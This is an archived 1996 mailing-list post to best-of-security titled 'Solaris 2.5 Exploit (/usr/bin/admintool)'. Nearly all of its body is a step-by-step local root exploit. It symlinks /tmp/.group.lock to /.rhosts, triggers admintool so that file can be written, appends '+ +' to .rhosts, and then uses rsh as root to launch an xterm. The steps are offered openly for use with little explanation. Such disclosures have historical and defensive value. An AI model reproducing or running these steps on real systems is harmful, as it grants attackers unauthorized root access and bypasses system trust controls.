From th@online.no  Tue Jul 30 21:45:52 1996
Received: from online.no (pat.online.no [193.212.1.13]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id VAA20632 for <best-of-security@suburbia.net>; Tue, 30 Jul 1996 21:45:34 +1000
Received: from netto.telepost.no (netto.telepost.no [193.212.1.11]) by online.no (8.7.5/8.7.3) with ESMTP id NAA07481 for <best-of-security@suburbia.net>; Tue, 30 Jul 1996 13:45:03 +0200 (MET DST)
From: Tor Houghton <th@online.no>
Received: (from th@localhost) by netto.telepost.no (8.7.5/8.7.3) id NAA22247 for best-of-security@suburbia.net; Tue, 30 Jul 1996 13:45:14 +0200 (MET DST)
Message-Id: <199607301145.NAA22247@netto.telepost.no>
Subject: BoS: Solaris 2.5 Exploit (/usr/bin/admintool)
To: best-of-security@suburbia.net
Date: Tue, 30 Jul 1996 13:45:14 +0200 (MET DST)
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

I found that /usr/bin/admintool was easier.

setenv DISPLAY yourdisplay:0.0
ln -s /.rhosts /tmp/.group.lock
/usr/bin/admintool
(browse -> group -> edit a group -> get an error message -> exit)
echo "+ +" >> .rhosts
/usr/bin/rsh localhost -l root "(/usr/openwin/bin/xterm&)"

Just my opinion.

Tor Houghton
Telenor Online AS